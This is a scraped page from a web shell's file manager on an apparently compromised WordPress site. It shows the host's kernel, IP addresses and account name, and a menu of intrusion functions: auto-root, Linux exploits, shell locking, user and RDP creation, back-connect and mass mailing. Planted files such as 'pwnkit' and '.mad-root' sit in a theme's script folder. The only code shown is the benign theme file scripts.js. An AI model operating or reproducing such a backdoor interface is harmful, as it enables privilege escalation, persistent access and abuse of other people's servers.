Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
carousel-init.js
612
B
-rw-r--r--
customizer.js
11.62
KB
-rw-r--r--
html5shiv.js
9.95
KB
-rw-r--r--
image-uploader.js
1.19
KB
-rw-r--r--
imagesloaded.pkgd.js
26.02
KB
-rw-r--r--
imagesloaded.pkgd.min.js
6.79
KB
-rw-r--r--
jquery.fitvids.js
3.27
KB
-rw-r--r--
jquery.scrolly.js
2.4
KB
-rw-r--r--
jquery.sticky.js
5.57
KB
-rw-r--r--
masonry-init.js
301
B
-rw-r--r--
navigation.js
837
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
scripts.js
3.25
KB
-rw-r--r--
skip-link-focus-fix.js
650
B
-rw-r--r--
slick.js
83.3
KB
-rw-r--r--
slick.min.js
40.59
KB
-rw-r--r--
waypoints.js
17.53
KB
-rw-r--r--
waypoints.min.js
8.82
KB
-rw-r--r--
wow-init.js
58
B
-rw-r--r--
wow.js
13.18
KB
-rw-r--r--
wow.min.js
8.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scripts.js
//Sets the header image height jQuery(function($) { if ( $(window).width() > 1024 ) { var height = $(window).height(); $('.has-banner, .overlay').css('height', height); $(window).resize(function() { var height = $(window).height(); $('.has-banner, .overlay').css('height', height); }); } $(window).resize(function(){ if ($(".header-image").css("display") == "none" ){ var height = $(window).height(); $('.has-banner, .overlay').css('height', height); } else { $('.has-banner, .overlay').css('height', 'auto'); } }); }); //Page loader jQuery(function($) { $('#page').css('visibility', 'visible'); }); //Menu dropdown animation jQuery(function($) { $('.sub-menu').hide(); $('.main-navigation .children').hide(); $('.menu-item').hover( function() { $(this).children('.sub-menu').slideDown(); }, function() { $(this).children('.sub-menu').hide(); } ); $('.main-navigation li').hover( function() { $(this).children('.main-navigation .children').slideDown(); }, function() { $(this).children('.main-navigation .children').hide(); } ); }); //Fit Vids jQuery(function($) { $(document).ready(function(){ $("body").fitVids(); }); }); //Waypoints jQuery(function($) { $('.fact').waypoint(function(down) { $('.fact').each(function () { var $this = $(this); $({ Counter: 0 }).animate({ Counter: $this.attr('id') }, { duration: 1000, easing: 'swing', step: function () { $this.text(Math.ceil(this.Counter)); } }); }); }, { offset: '90%', triggerOnce: true }); $('.skill-bar').waypoint(function(down) { $('.skill-bar').each(function() { var bar = $(this); var max = $(this).attr('id'); var progressBarWidth = max * bar.width() / 100; bar.find('div').animate({ width: progressBarWidth }, 1000).html(max + "% "); }); }, { offset: '90%', triggerOnce: true }); }); //Make the menu sticky jQuery(function($) { $(window).bind("load", function() { $(".top-bar").sticky(); }); }); //Better support for third party widgets jQuery(function($) { $('.so-panel.widget, .panel.widget').addClass('container'); }); //Open social links in a new tab jQuery(function($) { $( '.social-area li a, .social-widget a' ).attr( 'target','_blank' ); }); //Smooth scrolling jQuery(function($) { $('a[href*="#"]:not([href="#"],[class*="tab"] a,.wc-tabs a, .activity-content a)').click(function() { if (location.pathname.replace(/^\//,'') == this.pathname.replace(/^\//,'') && location.hostname == this.hostname) { var target = $(this.hash); var topbar = $('.top-bar').height(); target = target.length ? target : $('[name=' + this.hash.slice(1) +']'); if ( this.hash != '#site-navigation' && $(window).width() > 1024 ) { if (target.length) { $('html,body').animate({ scrollTop: target.offset().top - topbar + 40 }, 800); return false; } } else { if (target.length) { $('html,body').animate({ scrollTop: target.offset().top }, 800); return false; } } } }); }); //Search form jQuery(function($) { $('.nav-search').click(function() { $('.nav-search-box').addClass('search-visible'); }); $('.search-close').click(function() { $('.nav-search-box').removeClass('search-visible'); }); });
Close